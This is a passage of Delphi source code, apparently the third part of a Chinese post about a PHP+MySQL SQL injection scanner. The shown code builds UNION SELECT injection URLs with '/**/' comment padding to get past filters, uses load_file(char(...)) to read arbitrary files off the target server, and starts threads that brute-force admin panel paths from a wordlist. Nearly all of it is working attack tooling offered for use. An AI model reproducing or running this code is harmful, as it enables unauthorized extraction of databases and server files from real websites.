PHP+MYSQL网站注入扫描[3]

p;   end;
    mm.lines.add('');
    mm.lines.add('字段猜解结束。。。');
  // sbscan2.caption :='猜解';
  end;
except
end;

isfinish :=true;
end;

procedure tform1.fieldthreadexit(sender: tobject);
begin
inc(n);
pg1.stepit;
if n = lsbdict.count then
begin
  isfinish :=false;
  mm.lines.add('');
  mm.lines.add('字段猜解结束。。。');
  pg1.visible :=false;
  sbscan2.caption :='猜解';
  exit;
end;
end;

procedure tform1.lvfieldclick(sender: tobject);
begin
if lvfield.selected.caption='1' then
begin
  edtfield1.text :=lvfield.items[0].subitems.gettext;
  spfield1.text :=lvfield.items[0].caption;
end else
begin
  edtfield2.text :=lvfield.selected.subitems.gettext;
  spfield2.text :=lvfield.selected.caption;
end;
end;

procedure tform1.lvtableclick(sender: tobject);
begin
edttable.text :=lvtable.selected.subitems.gettext;
end;

procedure tform1.sbrecordclick(sender: tobject);
var i:integer;
begin
istr :='';
for i:=1 to strtoint(edtfieldnum.text) do
begin
  if i=strtoint(spfield1.text) then
    istr :=istr+','+trim(edtfield1.text)
  else if i=strtoint(spfield2.text) then
    istr :=istr+','+trim(edtfield2.text)
  else istr :=istr+','+inttostr(i);
end;
if istr<>'' then
  istr :=copy(istr,2,length(istr)-1);

injurl :=url+'/**/and/**/1=2/**/union/**/select/**/'+istr
      +'/**/from/**/'+trim(edttable.text)+'/**/where/**/'+trim(edtid.text)+'/*';

mm.lines.add(injurl);
if get(injurl,'') then
begin
  wb.navigate(injurl);
  pcphpinj.activepageindex :=3;
end;
end;

procedure tform1.sbfileclick(sender: tobject);
var i,j:integer;
  str,fname:string;
begin
if edtfilename.text='' then
begin
  msgbox('请输入要猜解的文件名！');
  exit;
end;
fname :=trim(edtfilename.text);
istr :='';
for i:=1 to length(fname) do
begin
  istr :=istr+','+ inttostr(ord(fname));
end;
if istr<>'' then
begin
  istr :=copy(istr,2,length(istr)-1);
  istr :='load_file(char('+istr+'))';
end;

str :='';
for j:=1 to strtoint(edtfieldnum.text) do
begin
  if j=strtoint(spnum.text) then
    str :=str+','+istr
  else str :=str+','+inttostr(j);
end;
if str<>'' then
  str :=copy(str,2,length(str)-1);

injurl :=url+'/**/and/**/1=2/**/union/**/select/**/'+str+'/*';
mm.lines.add(injurl);
if get(injurl,'') then
begin
  wb.navigate(injurl);
  pcphpinj.activepageindex :=3;
end;
end;

procedure tform1.sbstop2click(sender: tobject);
var i:integer;
begin
isfinish :=true;
{ if n>=lsbdict.count then exit;
for i:=n to lsbdict.count-1 do
begin
  if scanfield.freeonterminate then
  begin
    scanfield.suspend;
    scanfield.free;
  end;
end;
mm.lines.add('');
mm.lines.add('字段猜解结束。。。');   }
end;

procedure tform1.sbscan3click(sender: tobject);
var
i,ipos,sum:integer;
begin
if isfinish=false then
begin
  url :=trim(edtinjurl.text);
  if pos('http://',url)>0 then
  begin
    url :=copy(url,8,length(url)-7);
    ipos :=pos('/',url)
  end else
    ipos :=pos('/',url);
  url :='http://'+copy(url,1,ipos-1);
  if url='' then exit;
 
  lsbdict.items.clear;
  listbox1.items.clear;
  mm.lines.clear;
  m :=0;
  lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_manager.txt');
  sum :=lsbdict.count;
  pg1.min :=0;
  pg1.max :=sum;
  pg1.step :=1;
  pg1.position :=0;
  pg1.visible :=true;
  mm.lines.add('开始猜解后台路径。。。');
  mm.lines.add('');
  setlength(scanmanager,sum);   // 动态设置线程的数量
  ////开始扫描后台路径
  for i:=0 to sum-1 do
  begin
    scanmanager := scanmanagerthread.create(url,i,listbox1,mm);
    scanmanager.onterminate := managerthreadexit;
  end;
end;

if isfinish=true then
begin
  try
    for i:=m to lsbdict.count-1 do
    begin
    if scanmanager.freeonterminate then
    begin
      scanmanager.suspend;